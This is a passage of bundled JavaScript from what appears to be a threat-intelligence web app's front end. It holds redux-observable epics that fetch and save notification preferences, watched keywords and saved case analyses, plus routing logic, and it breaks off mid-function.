/* unused harmony export addWatchedKeywordEpic */
/* unused harmony export deleteWatchedKeywordEpic */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(800);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__types_js__ = __webpack_require__(801);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__getters_js__ = __webpack_require__(1471);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__constants_js__ = __webpack_require__(3433);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__ = __webpack_require__(76);







var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:profile:epics'); // eslint-disable-line no-unused-vars







var viewLoadedEpic = function viewLoadedEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('payload')).filter(function (x) {
    return x.pathname === '/settings/notifications';
  }).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* FETCH_PREFERENCES */] }, { type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */] }]);
  });
};

var fetchPreferencesEpic = function fetchPreferencesEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* FETCH_PREFERENCES */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* NOTIFICATION_PREFERENCES_ENDPOINT */]).mergeMap(function (_ref2) {
      var response = _ref2.response;
      return [{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* FETCH_PREFERENCES_SUCCESS */],
        payload: response
      }];
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["h" /* FETCH_PREFERENCES_FAILURE */],
        error: true,
        payload: err
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["error"])('There was an error loading notification preferences.')]);
    });
  });
};

var updatePreferencesEpic = function updatePreferencesEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["m" /* UPDATE_PREFERENCES */]).mergeMap(function (_ref4) {
    var payload = _ref4.payload;
    return ajax.putJSON(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* NOTIFICATION_PREFERENCES_ENDPOINT */], payload).mergeMap(function (_ref5) {
      var response = _ref5.response;
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* UPDATE_PREFERENCES_SUCCESS */],
        payload: response
      }, {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* FETCH_PREFERENCES */]
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["success"])('Your notification preferences have been updated.')]);
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* UPDATE_PREFERENCES_FAILURE */],
        error: true,
        payload: err
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["error"])('There was an error saving your notification preferences.')]);
    });
  });
};

var fetchWatchedKeywordsEpic = function fetchWatchedKeywordsEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_8__constants_js__["b" /* WATCHED_KEYWORDS_ENDPOINT */]).map(function (_ref7) {
      var response = _ref7.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* FETCH_WATCHED_KEYWORDS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* FETCH_WATCHED_KEYWORDS_FAILURE */],
        error: true,
        payload: err
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["error"])('There was an error loading your watched keywords.')]);
    });
  });
};

var addWatchedKeywordEpic = function addWatchedKeywordEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* ADD_WATCHED_KEYWORD */]).mergeMap(function (action) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_8__constants_js__["b" /* WATCHED_KEYWORDS_ENDPOINT */], action.payload).mergeMap(function (_ref9) {
      var response = _ref9.response;
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* ADD_WATCHED_KEYWORD_SUCCESS */],
        payload: response
      }, {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */]
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["success"])('Your keyword has been added.')]);
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* ADD_WATCHED_KEYWORD_FAILURE */],
        error: true,
        payload: err
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["error"])('There was an error adding the watched keyword.')]);
    });
  });
};

var deleteWatchedKeywordEpic = function deleteWatchedKeywordEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* DELETE_WATCHED_KEYWORD */]).mergeMap(function (action) {
    return ajax.delete(__WEBPACK_IMPORTED_MODULE_8__constants_js__["b" /* WATCHED_KEYWORDS_ENDPOINT */] + '/' + action.payload).mergeMap(function (_ref11) {
      var response = _ref11.response;
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* DELETE_WATCHED_KEYWORD_SUCCESS */],
        payload: response
      }, {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH_WATCHED_KEYWORDS */]
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["success"])('Your keyword has been removed.')]);
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* DELETE_WATCHED_KEYWORD_FAILURE */],
        error: true,
        payload: err
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_alerts_actions_js__["error"])('There was an error deleting your watched keyword.')]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(viewLoadedEpic, fetchPreferencesEpic, updatePreferencesEpic, fetchWatchedKeywordsEpic, addWatchedKeywordEpic, deleteWatchedKeywordEpic));

/***/ }),
/* 3433 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return NOTIFICATION_PREFERENCES_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return WATCHED_KEYWORDS_ENDPOINT; });
var NOTIFICATIONS_ENDPOINT = '/services/notifications';
var NOTIFICATION_PREFERENCES_ENDPOINT = NOTIFICATIONS_ENDPOINT + '/preferences';
var WATCHED_KEYWORDS_ENDPOINT = NOTIFICATIONS_ENDPOINT + '/watched-keywords';

/***/ }),
/* 3434 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types__ = __webpack_require__(1349);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_search__ = __webpack_require__(253);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_reports__ = __webpack_require__(558);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_analysis__ = __webpack_require__(565);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_summaries_actions__ = __webpack_require__(1417);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_constellation_actions__ = __webpack_require__(576);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__users_actions__ = __webpack_require__(778);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__users_getters__ = __webpack_require__(779);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__app_actions__ = __webpack_require__(569);




var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:router:epics'); // eslint-disable-line no-unused-vars












var DISPATCH_SEARCH_AFTER_CLEAR = true;
/* NOTE: Respond to routing events with various actions.
 * Regrettably, the pathname is the only information we can
 * get from react-router-redux, the full pathname, w/out
 * the route id or query params. */
var navigationEpic = function navigationEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* LOCATION_CHANGE */]).mergeMap(function (_ref) {
    var payload = _ref.payload;

    /* *******************************************************
     * Build up actions[] based on different routing conditions
     ******************************************************** */
    var actions = [];

    var path = payload.pathname,
        searchQuery = payload.query.q,
        action = payload.action;


    var state = store.getState();
    var visited = state.getIn(['app', 'activity']);
    /* *******************************************************
     * Record route history
     ******************************************************** */
    actions.push(Object(__WEBPACK_IMPORTED_MODULE_12__app_actions__["setLastRoute"])(path));

    /* *******************************************************
     * Handle explore route:
     ******************************************************** */
    if (path.includes('browse')) {
      if (!visited.get('visitedExplore')) {
        actions.push(__WEBPACK_IMPORTED_MODULE_4_modules_app__["actions"].setActivity({ visitedExplore: true }));
      }
    }

    /* *******************************************************
     * Handle cases route:
     ******************************************************** */
    if (path.includes('browse/cases')) {
      actions.push(__WEBPACK_IMPORTED_MODULE_7_modules_analysis__["actions"].fetchAll());
    }

    /* *******************************************************
     * Handle search route:
     ******************************************************** */
    if (path.includes('browse/search')) {
      var existingSearch = __WEBPACK_IMPORTED_MODULE_5_modules_search__["getters"].searchTerm(state);

      /* One-time focus search bar! */
      if (!searchQuery && !existingSearch) {
        var searchInput = document.getElementById('@@_Search_Bazr');
        if (searchInput) searchInput.focus();
      }

      /* Run search! It happens here (also, search does not "refresh") */
      if (searchQuery && searchQuery !== existingSearch) {
        // If we are loading the site with a search query, don't want to clear reports or ioc filters
        actions.push(__WEBPACK_IMPORTED_MODULE_4_modules_app__["actions"].setActivity({
          visitedEntities: true,
          visitedReports: true
        }));
        actions.push(__WEBPACK_IMPORTED_MODULE_5_modules_search__["actions"].executeSearch(searchQuery));
      }
    }
    /* *******************************************************
     * Handle Report route:
     ******************************************************** */
    if (path.includes('browse/reports')) {
      if (!visited.get('visitedReports')) {
        actions.push(__WEBPACK_IMPORTED_MODULE_4_modules_app__["actions"].setActivity({
          visitedEntities: true,
          visitedReports: true
        }));
        actions.push(__WEBPACK_IMPORTED_MODULE_5_modules_search__["actions"].clearReportFilters(DISPATCH_SEARCH_AFTER_CLEAR));
      }
    }
    /* *******************************************************
     * Handle IOC route:
     ******************************************************** */
    if (path.includes('browse/iocs')) {
      if (!visited.get('visitedEntities')) {
        actions.push(__WEBPACK_IMPORTED_MODULE_4_modules_app__["actions"].setActivity({
          visitedEntities: true,
          visitedReports: true
        }));
        actions.push(__WEBPACK_IMPORTED_MODULE_5_modules_search__["actions"].clearEntityFilters(DISPATCH_SEARCH_AFTER_CLEAR));
      }
    }
    /* *******************************************************
     * Handle constellation route:
     ******************************************************** */

    if (path.includes('constellation')) {
      // If we have not fetched the user's list yet -- do so now. Reports, Cases and IOCs need the user list for auto suggestions in notes.
      if (!Object(__WEBPACK_IMPORTED_MODULE_11__users_getters__["userListPopulated"])(state)) {
        actions.push(Object(__WEBPACK_IMPORTED_MODULE_10__users_actions__["fetch"])());
      }
      // Collapse the summary, reset breadcrumbs
      actions.push(Object(__WEBPACK_IMPORTED_MODULE_8_modules_summaries_actions__["toggleShowEntireSummary"])({ show: false }));
      actions.push(Object(__WEBPACK_IMPORTED_MODULE_9_modules_constellation_actions__["resetBreadcrumbs"])());
    }

    if (path.includes('constellation/reports')) {
      var reportId = path.split('reports/')[1]; // HMMM
      actions.push(__WEBPACK_IMPORTED_MODULE_6_modules_reports__["actions"].setCurrentReportId(reportId));
      if (!visited.get('visitedConstellation')) {
        actions.push(__WEBPACK_IMPORTED_MODULE_4_modules_app__["actions"].setActivity({ visitedConstellation: true }));
      }
    }

    return actions;
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(navigationEpic));

/***/ }),
/* 3435 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAll", function() { return fetchAll; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "create", function() { return create; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "update", function() { return update; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "share", function() { return share; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteAnalysis", function() { return deleteAnalysis; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setAnalysisDisplayOptions", function() { return setAnalysisDisplayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAndStoreById", function() { return fetchAndStoreById; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(372);



var fetchAll = function fetchAll() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* FETCH_ALL */] };
};

var create = function create(analysis, graph) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["l" /* SAVE_ANALYSIS */],
    payload: { analysis: analysis, graph: graph }
  };
};

var update = function update(analysis, graph) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["t" /* UPDATE_ANALYSIS */],
    payload: { analysis: analysis, graph: graph }
  };
};

var share = function share(analysis) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["p" /* SHARE_ANALYSIS */],
    payload: analysis
  };
};

var deleteAnalysis = function deleteAnalysis(guid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* DELETE_ANALYSIS */],
    payload: guid
  };
};

var setAnalysisDisplayOptions = function setAnalysisDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["o" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

var fetchAndStoreById = function fetchAndStoreById(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* FETCH_ANALYSIS */],
    payload: id
  };
};

/***/ }),
/* 3436 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__action_types_js__ = __webpack_require__(372);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__getters_js__ = __webpack_require__(1472);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__constants_js__ = __webpack_require__(3437);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__utils_js__ = __webpack_require__(3438);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__ = __webpack_require__(76);













/* Fetch saved analyses, triggered on app initialization */
var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* FETCH_ALL */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */]).map(function (_ref2) {
      var response = _ref2.response;

      if (!Array.isArray(response)) {
        throw new Error();
      }
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["f" /* FETCH_ANALYSES_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(response.map(__WEBPACK_IMPORTED_MODULE_9__utils_js__["b" /* fromJSON */]))
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["e" /* FETCH_ANALYSES_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('There was an error fetching saved analyses')]);
    });
  });
};

/* Fetch shared analyses, triggered on app initialization */
var fetchSharedEpic = function fetchSharedEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* FETCH_ALL */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */] + '/shared').map(function (_ref4) {
      var response = _ref4.response;

      if (!Array.isArray(response)) {
        throw new Error();
      }
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["k" /* FETCH_SHARED_ANALYSES_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(response.map(__WEBPACK_IMPORTED_MODULE_9__utils_js__["b" /* fromJSON */]))
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["j" /* FETCH_SHARED_ANALYSES_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('There was an error fetching shared analyses')]);
    });
  });
};

/**
 * Fetch a single analysis graph.
 *
 * NOTE: This fetches a GRAPH. Just something to be clear on considering a lot
 * of the other logic in these epics is concerned with case CRUD. This epic is
 * concerned with fetching a graph and thus uses the graph endpoint.
 */
var fetchOneEpic = function fetchOneEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["g" /* FETCH_ANALYSIS */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).filter(Boolean) // Don't respond if ID empty
  .mergeMap(function (id) {
    var url = Object(__WEBPACK_IMPORTED_MODULE_5_trustar_utils__["querystring"])({ type: 'ANALYSIS', id: id })('/services/graph'); // See NOTE
    return ajax.get(url).map(function (_ref6) {
      var response = _ref6.response;
      return Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["a" /* analysisToConstellation */])(response);
    }).mergeMap(function (analysis) {
      var reportNodes = analysis.get('nodes').filter(function (x) {
        return x.get('type') === 'INCIDENT_REPORT';
      });

      /* NOTE: Graphs must contain at least one report node since the id will be
       * used as the id of the graph. We are also now preventing the save of a case
       * with no report nodes, but there may be some saved legacy cases with none. */
      if (reportNodes.count() > 0) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */],
          payload: { id: id, data: analysis }
        });
      } else {
        return [{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* FETCH_ANALYSIS_FAILURE */], payload: { id: id, data: analysis } }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["warn"])('Could not display saved analysis because no incident report nodes were found.')];
      }
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* FETCH_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('There was an error fetching the analysis.')]);
    });
  });
};

/* Create and save a new analysis from a regular graph */
var createAnalysisEpic = function createAnalysisEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["l" /* SAVE_ANALYSIS */]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).map(function (_ref8) {
      var _ref8$payload = _ref8.payload,
          analysis = _ref8$payload.analysis,
          graph = _ref8$payload.graph;

      var title = analysis.get('title');
      var savedAnalyses = __WEBPACK_IMPORTED_MODULE_7__getters_js__["saved"](store.getState());

      if (savedAnalyses.find(function (x) {
        return x.get('title') === title;
      })) {
        var message = 'You have already saved an analysis with this name. Please select a different name.';
        throw new Error(message);
      }

      /* Alternatively, we could create a way to render cases with no incident report nodes,
       see the fetchOneEpic for details. However, currently such a case will not render at
       all and this is an easy preventative measure for the time being. */
      if (!Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["c" /* hasReportNode */])(graph)) {
        var _message = 'You must include at least one incident report node to save a case.';
        throw new Error(_message);
      }

      return { analysis: analysis, graph: graph };
    }).mergeMap(function (_ref9) {
      var analysis = _ref9.analysis,
          graph = _ref9.graph;

      return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */], Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["d" /* toJSON */])(analysis, graph)).do(function (_ref10) {
        var guid = _ref10.response.guid;
        return __WEBPACK_IMPORTED_MODULE_2_react_router__["browserHistory"].push('/constellation/analysis/' + guid);
      }).mergeMap(function (_ref11) {
        var response = _ref11.response;

        return [{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["n" /* SAVE_ANALYSIS_SUCCESS */], payload: Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["b" /* fromJSON */])(response) }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["success"])('Case saved successfully.')];
      }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["m" /* SAVE_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('Case could not be saved.')]);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["m" /* SAVE_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])(err.message)]);
    });
  });
};

/* Update an analysis. */
var updateAnalysisEpic = function updateAnalysisEpic(action$, store, _ref12) {
  var ajax = _ref12.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["t" /* UPDATE_ANALYSIS */]).mergeMap(function (_ref13) {
    var _ref13$payload = _ref13.payload,
        analysis = _ref13$payload.analysis,
        graph = _ref13$payload.graph;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */] + '/' + analysis.get('guid'), Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["d" /* toJSON */])(analysis, graph)).mergeMap(function (_ref14) {
      var response = _ref14.response;

      return [{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["v" /* UPDATE_ANALYSIS_SUCCESS */], payload: Object(__WEBPACK_IMPORTED_MODULE_9__utils_js__["b" /* fromJSON */])(response) }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["success"])('Case updated successfully.')];
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["u" /* UPDATE_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('Case could not be updated.')]);
    });
  });
};

/* Share an analysis. */
var shareAnalysisEpic = function shareAnalysisEpic(action$, store, _ref15) {
  var ajax = _ref15.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["p" /* SHARE_ANALYSIS */]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).mergeMap(function (_ref16) {
      var analysis = _ref16.payload;

      var guid = analysis.get('guid');
      var share = {
        emails: analysis.get('sharedWith').reduce(function (a, c) {
          return a.concat(c.value);
        }, []),
        message: analysis.get('message')
      };
      return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */] + '/' + guid + '/share', share).mergeMap(function (_ref17) {
        var response = _ref17.response;

        if (response && Array.isArray(response)) {
          response = response.join(', ');
        }
        return [{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["r" /* SHARE_ANALYSIS_SUCCESS */], payload: { guid: guid, sharedWith: response } }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["success"])('Case shared successfully.')];
      }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["q" /* SHARE_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('Case could not be shared.')]);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["q" /* SHARE_ANALYSIS_FAILURE */], payload: err });
    });
  });
};

/* Delete an analysis. */
var deleteAnalysisEpic = function deleteAnalysisEpic(action$, store, _ref18) {
  var ajax = _ref18.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["a" /* DELETE_ANALYSIS */]).mergeMap(function (_ref19) {
    var guid = _ref19.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_8__constants_js__["a" /* ANALYSIS_ENDPOINT */] + '/' + guid).mergeMap(function (_ref20) {
      var response = _ref20.response;

      return [{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* DELETE_ANALYSIS_SUCCESS */], payload: guid }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["success"])('Case deleted successfully.')];
    }).catch(function (err) {
